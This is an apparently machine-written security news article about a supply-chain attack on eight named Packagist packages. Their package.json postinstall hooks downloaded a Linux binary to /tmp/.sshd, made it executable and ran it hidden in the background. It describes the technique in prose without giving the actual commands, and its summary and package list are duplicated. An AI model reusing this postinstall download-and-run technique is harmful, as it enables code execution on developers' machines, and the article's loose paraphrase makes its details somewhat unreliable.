Ethical Hacking News
A recent supply chain attack has compromised eight packages on Packagist, a popular package repository for PHP and JavaScript dependencies. The malicious code, designed to run a Linux binary retrieved from a GitHub Releases URL, was inserted into the package.json file of affected projects, bypassing Composer-related metadata.
Packagist, a popular package repository, was targeted by a coordinated supply chain attack compromising eight packages.The malicious code bypassed Composer-related metadata and evaded detection by security teams scanning PHP dependencies.The affected packages were updated with postinstall scripts that downloaded a Linux binary from a GitHub Releases URL, causing remote code execution during installation or build workflows.Socket found references to the same payload across 777 files in GitHub, suggesting it could be part of a broader campaign.The exact nature of the payload is unclear due to an unavailable GitHub account associated with the repository hosting it.The attack highlights the importance of monitoring and securing software dependencies, and the need for developers and security teams to consider cross-ecosystem placement in their risk assessments.
Packagist, a popular package repository for PHP and JavaScript dependencies, has been targeted by a coordinated supply chain attack that compromised eight packages. The malicious code, designed to run a Linux binary retrieved from a GitHub Releases URL, was inserted into the package.json file of affected projects, bypassing Composer-related metadata.
The attack, which has been dubbed "cross-ecosystem placement," is notable for its ability to evade detection by security teams scanning PHP dependencies. According to Socket, an application security firm that investigated the incident, the malicious code was triggered through postinstall scripts in package.json, rather than composer.json. This means that developers and security teams may only focus on Composer-related metadata when scanning for vulnerabilities, while skipping over lifecycle hooks bundled within the package.
The affected packages include moritz-sauer-13/silverstripe-cms-theme (dev-master), crosiersource/crosierlib-base (dev-master), devdojo/wave (dev-main), devdojo/genesis (dev-main), katanaui/katana (dev-main), elitedevsquad/sidecar-laravel (3.x-dev), r2luna/brain (dev-main), and baskarcm/tzi-chat-ui (dev-main).
An analysis of the affected packages revealed that their upstream repositories had been modified to include a postinstall script that attempts to download a Linux binary from a GitHub Releases URL. The script saves the downloaded binary to the "/tmp/.sshd" folder, changes its permissions using "chmod" to grant execute permissions to all users, and runs it in the background.
The names of the affected packages are listed below:
* moritz-sauer-13/silverstripe-cms-theme (dev-master)
* crosiersource/crosierlib-base (dev-master)
* devdojo/wave (dev-main)
* devdojo/genesis (dev-main)
* katanaui/katana (dev-main)
* elitedevsquad/sidecar-laravel (3.x-dev)
* r2luna/brain (dev-main)
* baskarcm/tzi-chat-ui (dev-main)
Socket's investigation found references to the same payload across 777 files in GitHub, suggesting that it could be part of a broader campaign. In at least two instances, the payload was added to a GitHub workflow. However, it is currently not known how many of these match distinct compromises, forks, duplicate package artifacts, or cached references.
The exact nature of the payload downloaded from GitHub is unclear, as the GitHub account associated with the repository hosting it is no longer available. The choice of the name "gvfsd-network" for the malware is interesting, as it refers to a GNOME Virtual File System (GVfs) daemon responsible for managing and browsing network shares.
According to Socket, even without the second-stage binary, the malicious installer is enough to warrant blocking. It provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors, and running a downloaded binary in the background.
The malicious attack on Packagist's eight packages serves as a reminder of the importance of monitoring and securing software dependencies. The supply chain attack highlights the need for developers and security teams to be vigilant when scanning for vulnerabilities and to consider cross-ecosystem placement in their risk assessments.
In recent months, there have been several high-profile attacks on package repositories and software dependencies. These incidents demonstrate the increasing sophistication and complexity of cyber threats and the importance of staying up-to-date with the latest security best practices.
To mitigate these risks, developers and security teams should consider implementing the following measures:
* Regularly scan for vulnerabilities in PHP and JavaScript dependencies
* Monitor package updates and changes to upstream repositories
* Implement secure coding practices and review code before deployment
* Use automated tools and services to detect and block malicious activity
By taking proactive steps to secure software dependencies, developers and security teams can reduce the risk of supply chain attacks like the one recently discovered on Packagist.
Related Information:
https://www.ethicalhackingnews.com/articles/Compromised-Packages-A-Supply-Chain-Attack-on-Packagists-8-Linux-Malware-ehn.shtml
https://thehackernews.com/2026/05/packagist-supply-chain-attack-infects-8.html
Published: Sat May 23 12:52:56 2026 by llama3.2 3B Q4_K_M
